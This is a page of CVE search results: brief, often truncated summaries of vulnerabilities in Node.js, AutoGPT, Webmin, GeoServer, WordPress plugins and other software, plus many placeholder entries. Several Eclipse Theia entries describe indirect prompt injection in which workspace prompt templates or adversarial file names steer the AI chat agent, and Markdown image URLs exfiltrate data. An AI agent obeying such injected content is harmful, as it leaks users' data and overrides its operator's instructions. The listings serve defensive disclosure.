365183 matches found
CVE-2026-48617
CVE-2026-48617 describes a flaw in Node.js permission model enforcement that allows bypass via path misvalidation in process.report.writeReport(), potentially affecting confidentiality and integrity under affected configurations. Affected: all supported Node.js release lines (22, 24, 26). Impact ...
CVE-2025-32437
CVE-2025-32437 affects AutoGPT prior to 0.6.63, specifically the MediaDurationBlock. The issue arises because MediaDurationBlock downloads and stores videos in a temporary directory without proper deletion, and StepThroughItemsBlock can iterate MediaDurationBlock multiple times, with no limit on ...
CVE-2025-32436
CVE-2025-32436 affects AutoGPT before version 0.6.63. The AddAudioToVideoBlock may download and store video and audio in a temporary directory without cleanup until all nodes complete, and there is no limit on disk usage or automatic deletion of the intermediate video after processing. Combined w...
CVE-2025-32424
AutoGPT contains a DoS vulnerability in ScreenshotWebPageBlock prior to version 0.6.63. When a user repeatedly screenshots many pages via StepThroughItemsBlock, there is no limit on loops or on disk space usage in the current working directory, allowing disk exhaustion. Version 0.6.63 patches thi...
CVE-2026-54106
CVE-2026-54106 affects the U.S. GAO EPDS and CBCA EDS login flow, where X-Forwarded-For headers are not validated. The underlying issue allows a remote attacker who has compromised administrator credentials to bypass network access controls and log in, potentially gaining access to restricted doc...
CVE-2026-54105
The CVE concerns CVE-2026-54105 affecting the GAO EPDS and CBCA EDS systems. The vulnerability arises from the update-profile/ API endpoint, where a remote, unauthenticated attacker can supply an arbitrary user_id and receive a JSON response containing account-specific information, including the ...
CVE-2026-54104
The CVE-2026-54104 entry covers a privilege escalation flaw in the U.S. GAO EPDS and CBCA EDS client authentication flow. The systems trust client-provided values for the epds_role_id parameter without verification, enabling a remote, authenticated attacker to raise their privileges. Affected com...
CVE-2025-32422
AutoGPT contains a DoS vulnerability in StepThroughItemsBlock leading to disk exhaustion via unbounded downloads to FileStoreBlock. Before version 0.6.63, StepThroughItemsBlock can iterate over an arbitrary list and trigger downloads to FileStoreBlock without limiting loop count, while FileStoreB...
CVE-2026-54103
CVE-2026-54103 affects GAO EPDS and CBCA EDS, where the /update-profile/N endpoint does not require authentication for password changes. The vulnerability allows a remote attacker to change an arbitrary user’s password without credentials. This result is supported by the CVSS data indicating high...
CVE-2026-56020
The CVE-2026-56020 affects the Webmin HTTP server (miniserv.pl). An unauthenticated attacker can bypass authentication by sending a forged HTTP header to impersonate any user who has an SSL client certificate configured, effectively spoofing certificate DNs to gain access. This is a network-based...
CVE-2026-56021
CVE-2026-56021 affects Webmin. An unauthenticated attacker can read contents of any .conf file in module directories because of a bypassable regex pattern, causing information disclosure (confidentiality impact: low). The CVSS metrics place it at Medium: CVSS v3.1 base score 5.3 (NETWORK, LOW com...
CVE-2026-56022
CVE-2026-56022 affects Webmin. The issue allows bypass of MFA by using basic authentication without session cookies when the attacker supplies the header User-Agent: webmin, enabling MFA bypass. The vulnerability is mitigated in Webmin 2.641. "Fixed in 2.641" from the advisory. No exploit details...
CVE-2025-32392
AutoGPT (workflow automation platform) contains a DoS vulnerability in the LoopVideoBlock before version 0.6.63, where looping a video has no resource limits. The attacker can set an unbounded number of loops, causing an excessively large video file to be written to disk and thereby exhaust disk ...
CVE-2026-55204
HAProxy CVE-2026-55204 affects HAProxy up to version 3.4.0. It describes a null pointer dereference in the function hpack_dht_insert (in src/hpack-tbl.c) that fails to validate the return value of hpack_dht_defrag() when the memory pool is exhausted. Under memory pressure, HPACK dynamic table ins...
CVE-2026-55203
HAProxy
CVE-2026-55205
Hermes WebUI prior to 0.51.468 is affected by a resource-exhaustion vulnerability in the unauthenticated POST /api/onboarding/oauth/start endpoint. The issue allows unbounded accumulation of in-memory flow state and daemon threads, enabling repeated or concurrent requests to exhaust server memory...
CVE-2026-56024
The CVE concerns the WordPress WP EasyPay plugin, affected versions
CVE-2026-55170
Technical details for CVE-2026-55170 are not publicly available in the provided documents; monitoring for updates is advised.
CVE-2026-55093
Technical details for CVE-2026-55093 are not publicly available in the provided documents; the entry is placeholder/reserved. Monitor for updates.
CVE-2026-54711
Technical details for CVE-2026-54711 are not provided in the supplied documents. No affected products, impact, or remediation are disclosed. Monitor for updates from the submitting organization.
CVE-2026-54695
Technical details for CVE-2026-54695 are not publicly available in the provided documents. Monitor for updates as information is not yet disclosed.
CVE-2026-55701
Technical details are not publicly available in the provided documents. Monitor for updates as more information becomes available.
CVE-2026-54005
Technical details for CVE-2026-54005 are not publicly available in the provided documents. The entry is reserved; monitor for updates.
CVE-2026-54004
Technical details for CVE-2026-54004 are not publicly available in the provided documents. Monitor for updates as information may be released by the reserving party.
CVE-2026-54003
Technical details for CVE-2026-54003 are not publicly available in the provided documents. Monitor for updates from the reporting organization and associated advisories.
CVE-2026-54002
Technical details for CVE-2026-54002 are not publicly available in the provided documents. No affected products, vectors, or fixes are disclosed. Monitor for updates and new information as it is published.
CVE-2026-50188
Technical details for CVE-2026-50188 are not publicly available in the provided documents. Monitor for updates.
CVE-2026-49276
Technical details for CVE-2026-49276 are not publicly available in the provided documents. Monitor for updates.
CVE-2026-56008
Summary: A privilege escalation vulnerability affects WordPress Fusion Builder plugin versions <= 3.15.4, as reported by Patchstack. The vulnerability was identified by daroo and pertains to the Fusion Builder plugin for WordPress. The provided connected document does not specify the underlyin...
CVE-2026-49274
Technical details for CVE-2026-49274 are not publicly available in the provided documents. This CVE entry appears reserved; monitor for updates as new details are published.
CVE-2026-47256
Technical details for CVE-2026-47256 are not publicly available in the provided documents. Monitor for updates and posted details.
CVE-2026-11791
The CVE-2026-11791 entry concerns 389 Directory Server (389-ds-base), where during schema reload the attr_syntax_swap_ht() function unconditionally frees attribute syntax information nodes, bypassing refcount-based deferred deletion. This can lead to use-after-free or double-free when LDAP query ...
CVE-2026-56006
CVE-2026-56006 : Connected document identifies a reflected Cross Site Scripting (XSS) vulnerability in WordPress H5P plugin versions
CVE-2026-44691
CVE-2026-44691 affects Eclipse Theia versions before 1.69.0. The issue arises when custom task definitions in workspace files (e.g., .theia/tasks.json, .vscode/tasks.json) can be executed without workspace trust, potentially enabling arbitrary commands to run with the user’s privileges if a malic...
CVE-2026-54847
CVE-2026-54847 is connected to a WordPress plugin issue: Stylish Cost Calculator, affected in versions
CVE-2026-22551
Eclipse Theia versions before 1.71.0 are affected: the AI chat could render Markdown image tags from AI responses, causing HTTP requests to arbitrary external URLs. In combination with a malicious workspace via prompt injection, an attacker could coax the AI agent to construct image URLs that lea...
CVE-2025-58175
CVE-2025-58175 affects GeoServer prior to 2.26.4 and 2.27.3. When GeoServer is configured to use a proxy base URL and ENTITY_RESOLUTION_ALLOWLIST, an unauthenticated Server-Side Request Forgery (SSRF) can be triggered. The issue only affects installations where the proxy base URL lacks a URL path...
CVE-2026-55885
Technical details for CVE-2026-55885 are not publicly available in the provided documents. Monitor for updates.
CVE-2026-54849
VulnerabilitySummary: WordPress plugin Premmerce Wishlist for WooCommerce (versions
CVE-2025-52465
GeoServer has an arbitrary file write vulnerability (CVE-2025-52465) in the Master Password Dump page. Before versions 2.26.4 and 2.27.3, an authenticated administrator with access to GeoServer’s security system can pass an absolute path as the target file name to the Master Password Dump page, c...
CVE-2026-55686
Technical details for CVE-2026-55686 are not publicly available in the provided documents. Monitor for updates as information about affected products, impact, and fixes may be released later.
CVE-2026-46580
Theia before v1.71.0 loads files matching .prompts/*.prompttemplate from a workspace, allowing attacker-controlled content to override the AI agent’s system prompts (indirect prompt injection). This enables attack chains with untrusted workspaces, potentially causing data exfiltration via Markdow...
CVE-2025-27511
CVE-2025-27511 affects the GeoServer DB2 DataStore Extension. According to the connected advisories, prior to version 2.27.0, an authenticated administrator could perform a JNDI attack via a specially crafted DB2 JDBC URL, leading to Remote Code Execution (RCE). The issue is the JNDI injection vu...
CVE-2026-44688
The vulnerability CVE-2026-44688 affects Eclipse Theia versions prior to 1.71.0. The AI chat agent processes workspace file and directory names as part of its prompt context without distinguishing them from system instructions, enabling indirect prompt injection when an attacker uses adversarial ...
CVE-2026-54848
CVE-2026-54848 is associated with a vulnerability in the WordPress APIExperts Square for WooCommerce plugin (WordPress plugin) with version
CVE-2026-54846
CVE-2026-54846 is backed by a PatchStack report describing a Broken Access Control vulnerability in the WordPress plugin Syncee Premium Dropshipping & Wholesale (versions
CVE-2026-54845
WordPress MDTF plugin
CVE-2026-50141
CVE-2026-50141 affects Woodpecker CI prior to 3.14.1, where the gRPC layer allowed an authenticated agent to impersonate another by forging agent_id in outgoing metadata. The server verified the JWT but then ignored it in favor of the client-supplied agent_id, enabling cross-tenant impersonation....
CVE-2026-9158
In Eclipse 4diac FORTE, versions 3.0.0 to 3.1.0 are affected by a vulnerability where a specially crafted DELETE command to the management interface can trigger a dangling pointer, allowing subsequent commands to access freed memory (use-after-free). This is the concrete issue described across co...
CVE-2026-56012
The CVE concerns the WordPress plugin Media Library Assistant (vulnerable from unknown through 3.35). The issue is an SQL Injection due to improper neutralization of special elements in SQL commands, enabling blind SQL injection. Affected component is the plugin’s data handling for user input in ...